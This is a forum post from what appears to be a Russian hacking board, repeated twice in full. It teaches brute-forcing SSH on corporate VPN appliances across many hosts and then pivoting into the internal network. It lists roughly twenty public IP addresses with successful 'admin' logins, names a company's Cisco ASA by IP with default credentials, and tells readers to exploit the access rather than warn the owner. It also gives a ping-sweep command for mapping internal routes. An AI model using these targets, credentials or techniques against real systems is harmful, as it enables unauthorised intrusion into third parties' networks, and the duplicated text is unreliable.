- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
I will talk about brute force awareness in VPN products and about essential information that you should collect when accessing these products and how this information is important for you to better understand your position on the network. In this last part I will use as an example an environmental solutions company that is using CISCO ASA products to access the internal network.
This article will be divided into two parts
As we know, there are several manufacturers on the market that offer hardware with VPN support for a direct channel into internal corporate or non-corporate networks. Example solutions:
Cisco, Citrix, Juniper, Fortinet, Ivanti, Zyxel, Sonicwall.
But these are not the only ways to set up a VPN between two networks. More advanced home routers also support VPN. I don't see any great advantage in attacking these, because they are rarely found in business environments, I don't see the value in the profitable pursuit. These are some manufacturers:
Asus, tp-link, netgear, linksys, keenetic.
Returning to the large manufacturers mentioned as the first example, what these products have in common is the possibility of connecting to services generally enabled for remote management, for example SSH, TELNET, WEB Portal and FTP. Although brute force tools exist for these products, many only work by attacking the web portal that these services have. But what to do when the WEB service is not available? As you know, if we have other services running, we can attack from those services. Another point about brute force tools: many limit you to testing just one host. We explore what is vulnerable, so it is not feasible to attack just one host for initial access. In this case when you want to test multiple hosts. So what you should do is test using a specific port for remote access. With this you will be able to test different hosts using common tools, such as the MSF module.
Посмотреть вложение 3344
As you noticed, the default username and password as shown in the image above was tested first. To avoid wasting time, you can specify the default username and password to be tested first, if found, brute force will stop testing new users and passwords, and you already have a valid username and password to connect , but this is optional.
In short, if you are interested in brute force testing a product, know that the WEB service is not the only way to do this. You may think this because some tools will only work based on the WEB service.
Targets tested
[+] 187.8.225.193:22 - Success: 'admin:' '
[+] 200.148.178.191:22 - Success: 'admin:' '
[+] 189.20.42.17:22 - Success: 'admin:' '
[+] 179.175.37.106:22 - Success: 'admin:' '
[+] 186.249.239.246:22 - Success: 'admin:' '
[+] 189.109.225.161:22 - Success: 'admin:' '
[+] 200.218.185.98:22 - Success: 'admin:' '
[+] 187.8.225.193:22 - Success: 'admin:' '
[+] 179.175.51.56:22 - Success: 'admin:' '
[+] 179.175.37.106:22 - Success: 'admin:' '
[+] 179.175.5.134:22 - Success: 'admin:' '
[+] 200.232.59.1:22 - Success: 'admin:' '
[+] 177.61.163.209:22 - Success: 'admin:' '
[+] 177.61.162.29:22 - Success: 'admin:' '
[+] 177.12.231.153:22 - Success: 'admin:' '
[+] 168.227.194.252:22 - Success: 'admin:' '
[+] 168.227.192.178:22 - Success: 'admin:' '
[+] 168.227.192.119:22 - Success: 'admin:' '
[+] 168.227.192.86:22 - Success: 'admin:' '
[+] 138.36.22.225:22 - Success: 'admin:' '
[+] 187.85.82.54:22 - Success: 'admin:' '
[+] 45.235.17.94:22 - Success: 'admin:' '
For each product there is information to be collected, this information can help you proceed in the post-exploitation phase and show how you can be seen from an access point of view. I will show you, in this example we will connect to the CISCO VPN, from the Cisco ASA line. The target will be:
Для просмотра ссылки Войдиили ЗарегистрируйсяIP: 12.235.164.146
Product: Cisco ASA
user: cisco
pass: cisco
Посмотреть вложение 3345
Don't try to help them. The only thing you'll get is a kick in the ass. Just enjoy the access to learn.
Each VPN solution has a client to connect to. For cisco we use:
Cisco AnyConnect Secure Mobility Client
Для просмотра ссылки Войдиили Зарегистрируйся
After installing the client we connect, like this:
Посмотреть вложение 3346
Connected:
Посмотреть вложение 3347
From this point, the first thing to do is list the routes that we can attack, this can be done using the route print -4 command, but this will only be useful to know what the IPv4 range format is. This way we can do a ping scan to discover new routes.
Route format consulted with the route print -4 command
Посмотреть вложение 3348
We know the format of the range and now we discover new routes by doing a ping scan, we inform the gateway for each route, see:
for /l %i in (1,1,254) do @ping -n 1 -w 100 192.168.%i.1 | findstr "bytes=32"
Посмотреть вложение 3349
Although we can use the route print command to obtain the routes, the result can be confusing. Therefore, I recommend using Nirsoft's NetRouteView for this functionality.
Download: Для просмотра ссылки Войдиили Зарегистрируйся
Посмотреть вложение 3375
We discovered 4 routes to attack, but not all routes have active hosts, the 192.168.40.0/24 route only has the gateway, we will focus on the 192.168.3.0/24 route where it has several hosts. I will use NETSCAN to scan, you can use any one you prefer.
Посмотреть вложение 3350
Download the anyconnect client and putty, so we can proceed to the final part 2. To be continued...
This article will be divided into two parts
As we know, there are several manufacturers on the market that offer hardware with VPN support for a direct channel into internal corporate or non-corporate networks. Example solutions:
Cisco, Citrix, Juniper, Fortinet, Ivanti, Zyxel, Sonicwall.
But these are not the only ways to set up a VPN between two networks. More advanced home routers also support VPN. I don't see any great advantage in attacking these, because they are rarely found in business environments, I don't see the value in the profitable pursuit. These are some manufacturers:
Asus, tp-link, netgear, linksys, keenetic.
Returning to the large manufacturers mentioned as the first example, what these products have in common is the possibility of connecting to services generally enabled for remote management, for example SSH, TELNET, WEB Portal and FTP. Although brute force tools exist for these products, many only work by attacking the web portal that these services have. But what to do when the WEB service is not available? As you know, if we have other services running, we can attack from those services. Another point about brute force tools: many limit you to testing just one host. We explore what is vulnerable, so it is not feasible to attack just one host for initial access. In this case when you want to test multiple hosts. So what you should do is test using a specific port for remote access. With this you will be able to test different hosts using common tools, such as the MSF module.
Посмотреть вложение 3344
As you noticed, the default username and password as shown in the image above was tested first. To avoid wasting time, you can specify the default username and password to be tested first, if found, brute force will stop testing new users and passwords, and you already have a valid username and password to connect , but this is optional.
In short, if you are interested in brute force testing a product, know that the WEB service is not the only way to do this. You may think this because some tools will only work based on the WEB service.
Targets tested
[+] 187.8.225.193:22 - Success: 'admin:' '
[+] 200.148.178.191:22 - Success: 'admin:' '
[+] 189.20.42.17:22 - Success: 'admin:' '
[+] 179.175.37.106:22 - Success: 'admin:' '
[+] 186.249.239.246:22 - Success: 'admin:' '
[+] 189.109.225.161:22 - Success: 'admin:' '
[+] 200.218.185.98:22 - Success: 'admin:' '
[+] 187.8.225.193:22 - Success: 'admin:' '
[+] 179.175.51.56:22 - Success: 'admin:' '
[+] 179.175.37.106:22 - Success: 'admin:' '
[+] 179.175.5.134:22 - Success: 'admin:' '
[+] 200.232.59.1:22 - Success: 'admin:' '
[+] 177.61.163.209:22 - Success: 'admin:' '
[+] 177.61.162.29:22 - Success: 'admin:' '
[+] 177.12.231.153:22 - Success: 'admin:' '
[+] 168.227.194.252:22 - Success: 'admin:' '
[+] 168.227.192.178:22 - Success: 'admin:' '
[+] 168.227.192.119:22 - Success: 'admin:' '
[+] 168.227.192.86:22 - Success: 'admin:' '
[+] 138.36.22.225:22 - Success: 'admin:' '
[+] 187.85.82.54:22 - Success: 'admin:' '
[+] 45.235.17.94:22 - Success: 'admin:' '
For each product there is information to be collected, this information can help you proceed in the post-exploitation phase and show how you can be seen from an access point of view. I will show you, in this example we will connect to the CISCO VPN, from the Cisco ASA line. The target will be:
Для просмотра ссылки Войди
Product: Cisco ASA
user: cisco
pass: cisco
Посмотреть вложение 3345
Don't try to help them. The only thing you'll get is a kick in the ass. Just enjoy the access to learn.
Each VPN solution has a client to connect to. For cisco we use:
Cisco AnyConnect Secure Mobility Client
Для просмотра ссылки Войди
After installing the client we connect, like this:
Посмотреть вложение 3346
Connected:
Посмотреть вложение 3347
From this point, the first thing to do is list the routes that we can attack, this can be done using the route print -4 command, but this will only be useful to know what the IPv4 range format is. This way we can do a ping scan to discover new routes.
Route format consulted with the route print -4 command
Посмотреть вложение 3348
We know the format of the range and now we discover new routes by doing a ping scan, we inform the gateway for each route, see:
for /l %i in (1,1,254) do @ping -n 1 -w 100 192.168.%i.1 | findstr "bytes=32"
Посмотреть вложение 3349
Although we can use the route print command to obtain the routes, the result can be confusing. Therefore, I recommend using Nirsoft's NetRouteView for this functionality.
Download: Для просмотра ссылки Войди
Посмотреть вложение 3375
We discovered 4 routes to attack, but not all routes have active hosts, the 192.168.40.0/24 route only has the gateway, we will focus on the 192.168.3.0/24 route where it has several hosts. I will use NETSCAN to scan, you can use any one you prefer.
Посмотреть вложение 3350
Download the anyconnect client and putty, so we can proceed to the final part 2. To be continued...